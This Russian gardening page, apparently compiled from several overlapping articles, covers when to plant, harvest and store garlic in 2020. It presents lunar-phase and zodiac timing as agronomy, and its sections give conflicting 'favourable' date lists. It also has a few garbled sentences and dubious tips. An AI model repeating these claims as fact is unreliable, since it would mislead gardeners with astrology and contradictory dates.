8 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Сроки уборки чеснока в 2020 году

Сроки выкапывания озимого чеснока на хранение в 2020 году

Чеснок – это популярная в России пряность. Данную культуру делят на разновидности: озимую и яровую либо зимнюю и летнюю. На сохранение урожая чеснока в большой степени влияет время, в которое он был выкопан. Если момент выбран неправильно, длительному хранению овощ подлежать не будет. Высаживают садовое растение под зиму примерно за месяц до наступления холодов.

Когда выкапывают урожай

Чтобы выращенный на даче чеснок мог сохраниться как можно дольше, выкапывают его своевременно. Учитывают при этом такие факторы, как погодные условия и регион проживания. Важно убирать чеснок по лунном календарю, что является правильным подходом. Перед сбором урожая землю вокруг рыхлят и расчищают. Делают это приблизительно за 25 дней до выкапывания головок.

Такой агротехнический прием позволяет все силы растения направить на наращивание головок. Стрелки должны обязательно завязаться. Когда это произойдет, ботва остановит свой рост. За месяц до уборки чеснока его перестают поливать. Это не позволит овощу загнить. Стрелки удаляют, оставив только несколько самых крепких. Из них потом собирают семена для посева.

Лунный календарь и зависимость от региона

  1. Подходящие даты для выкапывания озимого чеснока в июле: 5, 6, 7, 15, 18, 19, 23, 24 и 31.
  2. В августе для такой работы подойдут: 1, 2, 3, 4, 11, 12, 13, 29 и 30 числа.

Недозревший чеснок не собирают, в нем слишком много влаги, поэтому такой урожай сгниет. Посаженный весной овощ убирают в другое время.

Регионы России имеют разные климатические условия. На юге тепло и почти нет зимы, на Севере климат суровый и холодный. В Краснодарском крае и соседних регионах этот пряный овощ созревает очень быстро. В Подмосковье, на Урале и в Сибири для выращивания больше всего подходят ранние сорта. Урожай от поздних не успеют собрать до начала холодов. Выкапывают его обычно в июле. В этом месяце головки уже готовы для сбора. Сроки уборки зимнего и летнего чеснока различаются.

Как определить зрелость чеснока

Озимый чеснок имеет несколько признаков зрелости. Он отличается от обычного более крупными головками, дает обильный урожай. На его очистку у хозяек уходит значительно меньше времени. Определяют зрелость чеснока, по его листьям и головке. Основные признаки созревания:
  • листья приобретают желтую окраску;
  • свежие перья больше не появляются;
  • верхушки на чесночных стрелках начинают трескаться;
  • на чешуе головок появляются фиолетовые полосы;
  • шейка растения полностью высыхает.

Ранние сорта готовы к сбору через 3 месяца от появления первых всходов. Поздним сортам для созревания требуется около 110 дней. Есть такой простой прием для определения зрелости. На разные грядки высаживают чеснок разного размера. Овощ из мелких зубчиков вызревает примерно на неделю раньше.

Чем опасна несвоевременный сбор

Если время уборки будет упущено, последствия для плодов будут негативными. Слишком долгое пребывание в земле делает головки рыхлыми и мягкими. Иногда в таком случае они распадаются на отдельные дольки, что приводит к появлению новых всходов. Патогенные микроорганизмы начинают активно воздействовать на корнеплод, вызывая его порчу. Такой урожай долго не пролежит.

Рано не выдергивают чеснок. Он не достигнет стадии созревания и не успеет полностью сформироваться чешуя, что ускоряет порчу продукта. Одной конкретной даты для уборки не существует, каждый год смотрят по погоде и сорту.

Правила уборки урожая и подготовка чеснока к хранению

Начинают выкапывать головки сразу, как только они созрели. Промедление в этом вопросе приведет к снижению товарного вида и качества овоща. Для проведения работы выбирают сухую погоду. Удобным инструментом при этом являются вилы.

Если выдергивают овощ руками, то головка может остаться в земле. Действуют аккуратно, чтобы не испортить чесночные головки. Если погода стоит без осадков, овощ оставляют сохнуть прямо на грядке. На ночь его накрывают, чтобы избежать намокания.

Чеснок не кладут просто с грядки на хранение. Выкопанные головки некоторое время просушивают. Делают это на улице, если есть такая возможность. Весь урожай тщательно перебирают, чтобы отделить поврежденные или больные экземпляры. Они не подлежат длительному хранению и подходят для употребления в пищу сразу.

После того, как все головки высохнут, начинают подготовку для хранения. Удаляют корни и стебли, но не полностью. Оставляют хотя бы несколько сантиметров. Если планируется помещение овоща в плетенки, убирают только корни. Головки раскладывают по их размеру. В первую очередь, съедают мелкие, а крупные могут полежать подольше. Правильное хранение чеснока позволит пролежать ему целый год и обеспечит посадочным материалом для следующего сезона.

Как хранят чеснок

Сберегают ароматную пряность несколькими способами. Создают косы из чеснока. Под этим подразумевают крепкое сплетение его стеблей и подвешивание их на веревку. Такие косы размещают в кладовке, они не занимают много места.

Хорошо подходят стеклянные банки. Этот материал не пропускает влагу и воздух, чем предотвращает развитие гнилостных процессов. Часто закладывают в банки целые головки, но лучше предварительно разобрать их на отдельные зубчики. Овощ хорошо просушивают.

Хранение в соли дает возможность избежать влажности. В выбранную емкость насыпают соль, кладут в нее головки и сверху их тоже покрывают слоем соли.

Парафин тоже помогает изолировать овощ от влаги. Растапливают на огне несколько свечей и в жидкий парафин по очереди погружают каждый экземпляр. Времени такой способ отнимает много. Хорошо чувствует себя чеснок в ящиках из картона или дерева, в которых есть отверстия для вентиляции.

Какие ошибки могут испортить продукт

Серьезной ошибкой является несоблюдение сроков уборки. Уборка ярового чеснока не должна быть слишком ранней или слишком поздней. Если выкапывают головки неаккуратно, полученные ими повреждения приведут к тому, что весь урожай будет испорчен. Непросушенный полностью овощ не сможет храниться длительное время, в нем начнут из-за влажности развиваться патогенные микроорганизмы, появится плесень. Не закладывают чесночные головки в полиэтиленовые пакеты или пластиковые емкости, такая тара не подходит для этой пряности. Важно подготовить головки чеснока. Условия хранения влияют на его длительность.

Чеснок – это вкусная и полезная пряность, которую добавляют во многие блюда. Он придает любой еде неповторимый аромат и пикантный островатый привкус. Эту пряность кладут в салаты, горячие блюда и холодные закуски. Используют для приготовления соусов и маринадов. Сохраняют выращенный на огороде озимый чеснок до следующего сезона применяя и следуя простым рекомендациям.

Посадка чеснока в 2020 году: календарь

Обеспечение оптимальных условий для роста и развития чеснока требует комплексного подхода, основанного на различных приемах агротехники и следовании природным ритмам. И начинать надо с выбора наиболее благоприятного времени для высадки культуры в соответствии с фазами Луны. Поэтому, чтобы посадка чеснока в 2020 году была проведена правильно, нужно проводить ее по лунному календарю, соблюдая при этом правила агротехники.

Сроки посадки

Чтобы правильно определить дни, когда сажать чеснок в 2020 году в землю, нужно понимать, что есть яровые и озимые сорта. Яровые высаживаются ранней весной, как только сходит снег и земля немного подсыхает (земляной ком не липнет к рукам). Соблюдение сроков очень влияет на объемы и качество урожая. В этот период зубки напитываются влагой, которая обеспечивает им полноценное развитие. Если опоздать на 12–15 дней, то головки получатся намного мельче.

Озимый чеснок высаживают с учетом того, чтобы до зимних холодов оставалось как минимум 1,5 месяца. Лучше всего для этого подходит последняя неделя сентября и начало октября. При более поздней посадке зубки не успеют укорениться, а более ранняя приведет к преждевременному росту и существенному уменьшению зимостойкости.

Кроме того, оптимально подходящие даты для выполнения таких работ необходимо определять с учетом лунного календаря. Благоприятные дни для посадки или посева чеснока в 2020 году указаны в приведенном ниже календаре.

Сорта
01 02 03 04 05 06 07 08 09 10
Яровой 6, 7 2, 3, 30 1, 27, 28
Озимый 22, 23 21

Если по каким-либо причинам посев чеснока в 2020 году в указанные дни невозможен, то его можно (хоть и нежелательно) перенести мероприятие на другую дату. Главное при этом – избегать дней, когда по лунному календарю будет фаза полнолуния и новой Луны.

Запрещенные для посева чеснока в 2020 году дн и указаны в таблице:

01 02 03 04 05 06 07 08 09
Новолуние 11 10 11 10 10 8 8 7 5 5
Полнолуние 27 26 27 25 25 23 22 21 19 19

Кроме того, есть еще ряд рекомендаций относительно того, когда можно сажать чеснок в 2020 году. Они касаются знаков Зодиака, в которых на момент посадки пребывает Луна:

  1. Плодородными считаются Рыбы, Рак, Телец, Скорпион. Если произвести посев чеснока в 2020 году под одним из этих знаков, это обеспечит быстрый рост и высокий урожай культуры.
  2. К нейтральным относятся Козерог, Дева, Стрелец, Весы. При Луне в этих знаках посадку можно проводить, но урожай будет средним.
  3. Неплодородными считаются Близнецы, Водолей, Лев, Овен. Во время пребывания Луны в этих созвездиях посев чеснока в 2020 году проводить нельзя.

В любом случае высаживать зубки в землю нужно на рассвете или в полдень. На растущей Луне рекомендуется вносить под посев минеральные удобрения, на убывающей – органическую подкормку.

Правила и условия

Под зубки не вносят свежий навоз, чтобы не повысить риск появления грибковых инфекций и накопления в мякоти нитратов. К тому же в таких условиях они плохо вызревают и остаются рыхлыми, поэтому плохо хранятся.

Непосредственно перед посадкой чеснока нельзя вскапывать грунт. Необходимо выдержать 12–15 дней, чтобы зубки не слишком заглублялись в землю, иначе нехватка воздуха приведет к гибели посадочного материала. Также усадка почвы вызовет изгибание корневой системы, при котором зубки не наберут нужную силу.

Посадку чеснока производят рядами в траншею глубиной 10 см с междурядьем 25 см и на расстоянии 8–10 см. При этом зубки полностью вдавливают в почву. Для яровых сортов глубину посадки можно уменьшить наполовину.

Выращивание семян

Чеснок нельзя постоянно высаживать зубцами. Чтобы предотвратить вырождение и накопление болезней, каждые 4-5 лет нужно проводить посев семенами. На следующий год они дают маленькие бульбочки, а из них через год вырастают обычные головки.

Для получения бульбочек определенное количество головок не выкапывают, а оставляют в земле и на следующую весну все зубки густо взойдут и дадут бульбочки. Их собирают осенью, а затем используют при посадке.

Уборка урожая

Чеснок созревает в среднем за 100 суток с момента появления всходов. Обычно озимые выкапывают в конце июля – начале августа, а яровые ­– с конца августа до середины сентября. Более точно дни, когда выкапывать чеснок, определяют по лунному календарю. Благоприятные даты для уборки урожая в 2020 году приведены в календаре:

Сорта Месяц
07 08 09
Яровой 16–23, 25, 28, 29 5, 11, 15–27
Озимый 5–7, 15, 18, 19, 23, 24, 31 1-4, 11–13, 29, 30

Полностью созревшие головки должны быть плотными, а зубцы – легко отделяться от них. Дополнительно зрелость подтверждает наличие следующих признаков:

  • оболочки бульбочек растрескиваются;
  • нижние листья желтеют;
  • ботва сохнет и наклоняется;
  • шелуха истончается;
  • вырастают молодые корни.

Степень зрелости зубков на момент уборки урожая очень важна для обеспечения качественного хранения, поскольку недозревшие быстро портятся, а перезревшие будут самостоятельно распадаться.

Как правильно посадить чеснок весной: видео

Посадка чеснока в 2020 году: календарь

Вся жизнь на планете подчиняется единым природным ритмам. Как ни странно, на многие природные земные явления оказывает влияние Луна. Лучшее время для посадки любой культуры рассчитывается в соответствии с фазами Луны. Высадка чеснока – не исключение. Лунный календарь, правила агротехники, заботливые руки человека – основные составляющие хорошего результата.

Сроки посадки

Это растение культивируют в открытом грунте. Высаживать чеснок можно осенью и весной. Озимые сорта высаживают с расчетом того, чтобы зубчики успели укорениться (но не пойти в рост). Это обеспечит им хорошую зимостойкость. В противном случае большинство посадочного материала погибнет зимой. По времени: конец сентября – начало октября, когда до холодов еще примерно 1,5 месяца.

Более точный ответ получают после изучения лунного календаря. Публикуем ниже в статье календарь на 2020 год. В нем можно найти самые благоприятные для работ дни и « черные» даты. Не стоит заниматься посадками в полнолуние и новолуние.

Весеннюю посадку (яровые сорта) осуществляют, как только сходит снег. Грунт должен прогреться до +5 ℃. При более высоких температурах чеснок не «пускается» в рост. Со сроками поможет календарь и старая примета – «земляной ком перестал липнуть к рукам».

Благоприятные для посадки/посева чеснока дни в 2020 г
Сорта Месяцы
март апрель май сентябрь октябрь
Яровой 6; 7 2; 3; 13 1; 27; 28
Озимый 22; 23 21
Фазы луны
Новолуние 11 10 10 5 5
Полнолуние 27 25 25 19 19

Во время посадочных работ нужно внести удобрения. Внесение минеральных удобрений рекомендуется сделать при посадке во время «растущей» луны. А если работали на «убывающую» – произвести подкормку органикой.

Желательно учесть местонахождение луны в знаке Зодиака. Среди них слывут урожайными: Рыбы, Рак, Телец, Скорпион.

Неурожайными в 2020 году будут: Близнецы, Водолей, Лев, Овен. Остальные знаки считаются нейтральными.

И даже относительно времени суток есть свои рекомендации. Заниматься посадкой рекомендуется на рассвете или в полдень.

Правила и условия

Для получения отличного урожая хорошо бы запомнить некоторые «тонкие» моменты севооборота этой культуры:

  1. Под чеснок необходимо отвести участок, хорошо освещаемый солнцем. Эта культура не дает хороший корешок в тени, только вершок. Зелени будет много, и она будет сочная.
  2. Каждый год обязательно нужно менять место посадки. Вредители луковичных находятся в почве до 5 лет. Только по истечении этого времени можно вернуться на старую грядку.
  3. Нельзя высаживать эту культуру после других луковичных или многолетних растений (вредители одни и болезни одинаковые).
  4. Не стоит вносить в почву навоз. Под чеснок он очень нехорош (велика вероятность возникновения грибковых инфекций). А вот перегной внести загодя будет отлично.
  5. Грунт необходимо подготовить заранее, за 12-15 дней до посадки. Почва должна осесть. Если этого не сделать, растение начнет испытывать недостаток кислорода. И рассада просто погибнет.
  6. На грядке разместить ряды траншей с глубиной примерно 10 см. Между рядами оставить расстояние около 25 см. Зубки высаживать на расстоянии 8-10 см.
  7. Зубчики нужно погрузить в землю полностью. Озимый чеснок рекомендуют закопать глубже ярового примерно наполовину.
  8. Существует способ посадки в шахматном порядке. Тогда посадку выполняют еще и на разную глубину.
  9. Озимый чеснок в процессе роста выпускает стрелки. В дальнейшем при уходе их нужно будет удалять.
  10. У ярового чеснока для посадки нужно брать крайние зубчики, они крупнее. И хотя яровой чеснок по размерам обычно мельче озимого, хранится он лучше. У сорта нет стрелок.
  11. Для посадки отбирают зубчики только из здоровых головок. Если хотя бы один зубец испортился, головку нужно отсортировать. И делать это необходимо прямо перед посадкой.
  12. Донце луковицы при подготовке загодя может пересохнуть. Это затруднит прорастание или сделает его вообще невозможным.

Выращивание семян

Чеснок чаще выращивают, сажая дольки или зубчики. У хорошей луковицы их бывает до пятидесяти. Если не покупать посадочный материал, а использовать свой, то посадка только зубцами может привести к вырождению данного сорта. Чтобы этого не произошло, данный вид нужно обновлять каждые 4-5 лет.

Для этого нужно вырастить культуру, высаживая семена. И садить их нужно ежегодно. Ведь только на второй год после посадки у нового растения сформируется маленький корешок в виде неразъемной коробочки. И только она еще через год даст полноценную чесночную головку.

Уборка урожая

Это занятие – самое приятное: итог всей огородной работы.

Если урожай убрать не вовремя, то выращенный чеснок не будет долго и хорошо храниться. Недозрелые плоды начнут гнить. Перезревшие будут распадаться, и это тоже приведет к порче.

Как же правильно определить, что время уборки пришло? Для этого очень важно знать период созревания. У этого растения он около 100 суток. Если время подходит, нужно понаблюдать за растением. У созревшего плода:

  • истончается шелуха, и начинают отрастать молодые корешки;
  • головки начинают трескаться;
  • ботва сохнет, истончается и падает.

Вот тут-то по лунному календарю важно определиться с наиболее подходящими для уборки датами. Озимые и яровые сорта садились в разные сроки. Значит, и убирают их в разное время.

Когда нужно убирать озимый чеснок с грядок

Время на чтение: 6 минут

Полезный овощ собирают строго в срок. Правильная сборка урожая обеспечит длительное хранение. Нет секрета в том, когда нужно убирать озимый чеснок. Одни дачники ориентируются на лунный календарь, другие на метеорологические условия и особенности сорта, третьи на рекомендации относительно региона произрастания.

Как определить, что чеснок созрел и его пора выкапывать

Чтобы собранная культура долго хранилась, содержала максимальное количество полезных веществ и не утратила вкусовых качеств, важно собирать ее созревшей.

Признаки зрелости чеснока:

  • свежие перья не появляются;
  • соцветия на стрелках полопались;
  • перья полегли;
  • листья пожелтели на две трети.

Созревает чеснок согласно сроку, который предписан определенному сорту, в среднем три-четыре месяца. Если на луковичке появились фиолетовые прожилки, пора доставать головки из земли, к белым сортам это не относится. Важным показателем созревания является плотная сухая чешуя. Рекомендуется перед сбором выкопать пару головок озимого чеснока, чтобы проверить на зрелость. Для пробы выбирают овощи, которые выглядят слабее или меньше других (листья сохранили зелень, перья не утратили упругости).

Сроки уборки озимого чеснока в 2020 году

В 2020 году рекомендуется выкапывать чеснок в теплых краях в начале июля, в средней полосе – к середине месяца, а в северных широтах – ближе к концу. На срок сбора влияют:

  • личные предпочтения дачника;
  • влияние лунного календаря;
  • погодные явления;
  • засушливость или чрезмерная дождливость в предшествующие месяцы.

Поздние сорта подходят к стадии созревания через четыре месяца, ранние за девяносто дней от первых всходов. Чем южнее область, тем быстрее зреют овощи. Опытные огородники прибегают к хитрости. Они сажают мелкий чеснок отдельно от крупного. Сначала проверяют мелкий, после его созревания крупный будет готов через 7-9 дней.

В зависимости от регионов

Важно собрать урожай не раньше и не позже срока. Ориентироваться только на внешние признаки неправильно. Есть культуры, которые сохраняют прямые перья и после созревания. Пока дачник будет дожидаться их падения, овощи станут непригодны для хранения. Недозревшие головки имеют мягкие зубчики, которые сильнее подвержены гниению. Перезрелые распадаются, утрачивая целостность.

  1. В средней полосе собирают 13-17 июля.
  2. В южных краях в начале месяца.
  3. В северных широтах после двадцатого июля.

Ранние сорта снимают с грядок на пару недель раньше. В сухое лето созревание наступает гораздо больше, а в дождливое – раньше. Рост плодов напрямую зависит от погодных условий в период вегетации.

Сдвижение сроков возможно в любом регионе. На это влияют дожди, ранние заморозки, холодный атмосферный фронт, резкие перепады температур. Ориентироваться на точную дату невозможно.

По лунному календарю

Садоводы обращаются за помощью к лунному календарю. В 2020 году по лунному календарю собирают посаженный осенью чеснок в июле 4-8, 14-17, 20-21, и 24-27. В августе ориентируются на 1-4, 10-13, 14-17, 27-29.

За двадцать пять дней до вскапывания чеснока, землю вокруг него рыхлят. За десять дней проводят процедуру завязки стрелок. Некоторые агрономы прекращают полив за месяц до сбора урожая. Это предотвращает возможное гниение плодов в сыром грунте.

Лунный календарь для огородника просто ориентир, а не свод законов. На него опираются для того, чтобы выкопать созревший чеснок, вобравший в себя всю пользу. Если копать на день позже или раньше, то ощутимой разницы не будет. Современные дачники не пользуются лунным календарем в качестве ориентира. Авторитетнее опираться на сроки, указанные в инструкции, особенности сорта и обилие осадков.

Как убирать озимый чеснок с грядки

Правила уборки урожая нужны для сохранения целостности плодов. Грамотный сбор – это залог длительного хранения без гниения и порчи продуктов. При уборке чеснока придерживаются следующих правил:

  • уборка осуществляется сразу после первых признаков готовности головок;
  • осуществляют сбор только в сухой погожий день;
  • поврежденные инструментом головки не хранят, употребляют в пищу;
  • собранный чеснок оставляют сохнуть на грядке до 10 дней.

Контакт с влагой недопустим. Если надвигаются тучи или по прогнозу будет дождь, то овощи убирают под навес или в сухое проветриваемое помещение. Откапывают вилами для сохранения целостности чеснока. Выдергивая руками, есть риск надломить стебель слишком коротко, повредить чешую.

Собирать чеснок с грядки нужно в течение одного дня, чтобы срок сушки был одинаковым. Если на головках много грязи и налипшего грунта, то его не счищают. После сушки землю мягко счищают руками, она быстро осыпается.

Раскапывают целиком, срезают ботву и корешки после сушки. При хранении косами перья не срезают. Если погода стоит солнечная, но грунт влажный, то просушивают плоды не на грядке, а на листах картона. Полезно сразу отсортировать крупные овощи от мелких. Последние хранятся хуже, лучше употребить их в пищу первыми.

Озимый чеснок богат микроэлементами, он годится в качестве посадочного материала, но непригоден для удобрения. Поврежденные, гнилые, пораженные плесенью головки выбрасывают на помойку. Если оставить в компостной куче, то они нанесут вред, сделают удобрение непригодным для использования. Для компоста годятся только корешки. Сожженная ботва оставляет золу, которая послужит отличным удобрением.

Дальнейшее хранение

Убранный с грядок урожай нужно правильно хранить. После полной просушки собирают в ящики и переносят в помещение. На каждом этапе исключают попадание влаги. Дальше следуют алгоритму:

  • осторожно очищают головки от остатков земли;
  • перебирают урожай, выбрасывают негодные плоды;
  • срезают корешок, ботву;
  • расплавленным парафином запечатывают срез корня и стебля.

Хранят в таком виде в ящиках, мешках, стеклянных банках. В качестве абсорбента используют золу, опилки, просохший песок, сухую шелуху. Нередко хранят в косах. Обработанные головки сплетают между собой листьями, подвешивают. Удобнее оставлять в сетках, подвешивая их. Хранение зубчиками подразумевает еще и лущение (снятие шелухи).

Зубчики следует укладывать только в абсорбирующее вещество, хозяйки предпочитают муку. Перед лущением разрешается вымыть шелуху, но затем оставить до полного высыхания. Крупные головки на посадочный материал откладывают отдельно. В помещении недопустима влажность, иначе плоды подвергнутся гниению.

Зрелость чеснока определяется рядом факторов, подкрепляется лунным календарем. После своевременного сбора овощи сушат, очищают и готовят к хранению. Безошибочное проведение мероприятий гарантирует долгий срок хранения урожая без потерь.

Сроки уборки чеснока по лунному календарю в 2020 году с учетом региона

12.12.2019 Катерина Волкова

По многовековой традиции чеснок высаживают весной и перед наступлением зимы. Многие дачники садят его именно осенью. Для сбора урожая выбирают летние месяцы, когда овощ достиг максимальной зрелости. Существуют разные периоды уборки. Они зависят от климатических условий конкретного региона и данных лунного календаря.

Оптимальные сроки

Обязательно учитывают особенности территории и ее климатическую зону. В среднем, сбор начинают с середины июля. Этот период подходит для выкапывания озимого сорта. В августе выдергивают яровой вид. Если лето слишком холодное или засушливое, жаркое, то допустимо сдвинуть сроки на 5-7 суток. Есть особые рекомендации по климатическим поясам.

  1. Беларусь – вторая декада июля, после дня Петра и Павла.
  2. Подмосковье и московская области – после 15 июля.
  3. Тверская, Костромская, Владимирская области. Сажают яровой сорт. Уборка начинается с конца августа и длится до середины сентября.
  4. Южные регионы – Кубань, Кавказ, Крым – начало июля. Сбор чеснока на еду проводят в июне.
  5. В Сибири и за Уралом зимний сорт дергают после 20 июля. Если лето холодное, то можно сдвинуть дату ближе к августу.
  6. Средняя полоса России – первая декада июля.
  7. Весенние посевы убирают в середине августа.

Выкапывать чеснок, посаженный под зиму в 2020 году можно по специальному календарю лунных суток.

Месяц Дата
5-8, 15-30
1,3,11-12, 14-17, 26, 29, 30

В противном случае головки могут погибнуть от влаги, если их неграмотно просушить. Лучше всего убирать чеснок по лунному календарю с соблюдением поправок на регион.

Признаки зрелости чеснока

Прежде, чем выкапывать чеснок, посаженный весной или зимой, проверяют его зрелость. У молодых головок слишком тонкое покрытие и их не получится сохранить длительное время. Они начнут портится уже через 2-3 недели. Некоторым нравится вкус «молодого» чесночка, для этого действительно его нужно выдернуть раньше назначенного срока. Чтобы определить степень готовности обращают внимание на 3 фактора:

  1. Подсохла и покрылась желтизной нижняя часть листьев.
  2. Побеги, расположенные сверху стали вялыми. Если ботва совсем завяла, полегла, то сбор задержан на длительное время. В таком случае выдергивание проводят незамедлительно.
  3. Листва снизу стала желтая, а стрелка вытянулась вверх. У озимого сорта стрелка при развитии и росте должна быть скрученной. Как только она стала прямой это свидетельствует о зрелости.

Дачники удаляют стрелки в середине июня, при выполнении сельскохозяйственных работ. Лучше оставить несколько до выкапывания, чтобы не ошибиться с датой сбора.

Если обнаружены полопанные соцветия урожай снимают незамедлительно. Когда у соцветий кончики листвы раскрылись, можно увидеть семена. Семенной материал не выбрасывают, а используют на посев в следующем сезоне. У зрелой бульбочки плотное строение, а зубчики легко отделяются от сердцевины. Сверху головка покрыта множеством слоев шелухи. Для разделения ее на составляющие элементы не потребуется много сил.

Для определения степени готовности к очищению грядки достаточно вытащить 2-3 головки. Не желательно передерживать чеснок. Он не вырастет еще больше, а вот перезревание негативно скажется на качестве продукта.

Как выкапывать

Выдергивать чеснок не по времени неправильно. Возможно 2 вида последствий. Запоздалая уборка – головки будут открыты и рассыпаны внутри почвы. Зубчики начнут пускать корни. При сильных и длительных дождях образуется гниение, плесень. Это снижает пригодность к длительному хранению.

Уборка ярового чеснока или обычного – простое занятие. С ним способен справится любой человек. Нужно соблюдать ряд важных правил:

  1. Перед вытаскиванием снижают уровень полива. Делают это в середине июня.
  2. За 7 суток до копки полив прекращают. Это позволит доставать головки сухими и чистыми.
  3. За 3 дня прорыхлить землю. Это способствует улучшению доступа кислорода.
  4. За неделю нужно отгрести немного грунта сверху грядки в области около посадок.
  5. Ускорить созревание можно связыванием листочков в узел.
  6. Сбор осуществляют в сухую, теплую погоду.
  7. Плоды подкапывают при помощи вил. Лопата повредит чесночины.
  8. Поврежденные зубчики не оставляют для хранения. Их используют для приготовления пищи или еды.
  9. Подгнившие головки выбрасывают.
  10. Чтобы удалить налипшую землю ее убирают руками.

Запрещено трясти чеснок и бить его друг об друга. Это повредит целостность зубчиков, приведет к осыпанию шелухи. Выполняют сортировку.

Подготовка и хранение чеснока

Убирая урожай с грядки на хранение нужно его грамотно подготовить. Просушка длится порядка 1.5 недель. Процедура простая. Собранный продукт раскладывают в сухом, защищенном от дождя месте. В засушливом регионе головки оставляют прямо на грядке. Лучше выбирать пространство веранды, закрытого балкона, сарая и т.д. Как только плоды просохли у них отрезают ботву с корешками. В противном случае зимой начнется прорастание. Корешок должен иметь длину в 3-5 мм. Обрезку делают при помощи садовых ножниц или секатора.

Чеснок добавляют в блюда, средства для ухода за телом, волосами, применяют как отдельную пищу и как компонент гарниров. Чтобы наслаждаться вкусным, свежим, полным полезных веществ урожаем нужно его правильно сохранить после сбора.

В емкости

Для этого можно применить сосуды в виде: банки из стекла, глиняного горшка.

  • подготовленную посуду тщательно промывают, просушивают и прокаливают в духовом шкафу;
  • головки укладывают внутрь;
  • не требуется закатывать;
  • не плотно накрывают крышкой;
  • размещают в сухом месте.

Идеальное место то, где:

  • отсутствуют прямые лучи ультрафиолета;
  • хорошая вентиляция воздуха;
  • температура варьируется в пределах +15+20 о С;
  • уровень влажности не превышает 60%.

Запрещено ставить банки или горшки около источников тепла, например:

  • плит;
  • микроволновых печей;
  • радиаторов;
  • обогревателей;
  • домашней печки.

Не стоит выбирать подвал или погреб. Там слишком высокая влажность. Аналогично обстоят дела с холодильником. Там продукт потеряет большую часть влаги, насыщенность вкуса. Для продления периода хранения головки кладут в банки, но каждый слой посыпают слоем муки в 4-5 см. Так луковички не смогут соприкоснуться друг с другом. Даже если 1 зубчик загниет, то другие останутся невредимыми. Мука отлично впитывает влагу, предотвращает образование и распространение плесени, гнили и других бактерий.

Не менее востребован метод с применением соли. В этом случае:

  • укладку делают рядами;
  • между ними насыпают 2-3 см соли.
  1. Отличный эффект обеззараживания.
  2. Исключено возникновение бактерий, микробов и грибка.
  3. Частички соли впитывают влагу.
  4. Продукт будет сохранен свежим до самой весны.

Чтобы добиться такого результата используют крупную каменную соль. Мелкая и йодированная не подойдет. Ее при производстве обрабатывают вредными веществами.

Капроновые колготки, сетки и мешочки

Вид у таких изделий не слишком привлекательный. Сам метод действенный. Головки нужно уложить в чулки и подвесить под потолком. Технология не требует затрат по времени, силам и средствам.

Сетки и мешочки – вариант аналогичный предыдущему, но более профессиональный. Специальные принадлежности продаются в садовых магазинах.

Картонные коробки, деревянные ящики – популярный способ. Удобный, практичный, недорогой, универсальный.

Старинная методика, которой пользовались несколько сотен лет назад. Для выполнения нужно:

  • не срезать ботву с головок;
  • сплести из листвы чесночин косу;
  • подвесить полученные косы на стенку или под потолок.

Хранение зубчиков

Если сбор был проведен позднее назначенной даты и чеснок слишком перезрел, то продукт:

  • перерабатывают;
  • употребляют в пищу как можно скорее;
  • заготавливают в виде зубчиков.

Для их хранения можно использовать 4 проверенных способа.

  1. Подсолнечное масло. Головки тщательно промывают, очищают от кожуры, не повреждая структуру зубчиков. Продукт раскладывают по стеклянным банкам и заливают маслом. Желательно оливковым, но допустимо подсолнечное. Добавляются специи по вкусу. Актуально применение: лаврового листа, горошин черного перца, итальянских трав. Емкость нужно накрыть крышкой, тщательно взболтать. Зубчики должны пропитаться полученной жидкостью. Банку ставят в холодильник или морозильную камеру. Комнатная температура не подходит. В таких условиях возможно появление и активное размножение бактерий clostridium botulinum. Они могут нанести существенный вред здоровью.
  2. Перетертый вид. Очищенные плоды перемалывают в пюре. Для этого применяют давилку или блендер. Добавляют оливковое масло в пропорции ½. Туда же отправляют орегано и другие ароматные специи. Банку можно поставить в холод или на мороз.
  3. Винный уксус или вино. Заготовка проделывают точно также как в предыдущих вариантах. Отличается завершающий этап. Банку из стекла заполняют сухим вином, например, красным, белым. Можно заменить его на винный уксус. Для придания овощу оригинального вкуса к вину подсыпают лавровый лист, острые специи. Сосуд тщательно взбалтывают и хранят в холодильнике в течение 4 месяцев.
  4. Сушеный вид. Такая форма имеет срок годности до 12 месяцев. Для просушки отдают предпочтение овощесушилке. На заготовку подойдут зубчики твердого, крупного формата. Температурный режим выбирают в соответствии с инструкцией от производителя. Чеснок нарезают на тонкие кружочки. Допустимо применение духового шкафа. Противень предварительно застилают пергаментом. На него кладут тонкие кружочки.

Просушку делают в течение 2 часов при температуре +60 о С. Далее нагрев снижают до +50+55 о С. Для определения готовности нужно надломить один кружочек. Он не должен источать сок и быть мягким на ощупь.

Советы по хранению

После того как получилось правильно подготовить головки стоит ознакомиться с рядом важных рекомендаций. Продукт может находится в разных условиях, но лучше всего выбирать помещение с влажностью воздуха в 60-80%. Если уровень будет: ниже, то головки пересохнут; выше – начнется гниение.

Нарушение концентрации влажности снижает период хранения до 60 суток. Немало важен и температурный режим:

  1. 0+7 о С- 3-12 месяцев.
  2. +8+15 о С – 2-9 месяцев.
  3. +15+23 о С 2-6 месяцев.
  4. Больше +24 о С – 7-55 дней.

Плоды не требуется промывать перед отправлением в погреб или погружением в стеклянные сосуды.

  1. Подсолнечное масло раскаляют на сковороде.
  2. Туда добавляют порядка 10 капель йода.
  3. Тщательно перемешивают.
  4. Головки обмакивают в раствор.
  5. Просушивают.

Для предотвращения прорастания чеснока ему подпаливают корешки. Для этого используют прямое воздействие огнем. Подойдет обычная зажигалка.

Чтобы выполнить правильное хранение чеснока нужно соблюдать выше представленные советы. Садить овощ можно не только под зиму, но и весной. Так в доме всегда будет полезный продукт и отличная приправа к мясу, рыбе, плову, жареным овощам.

Ссылка на основную публикацию
Adblock
detector
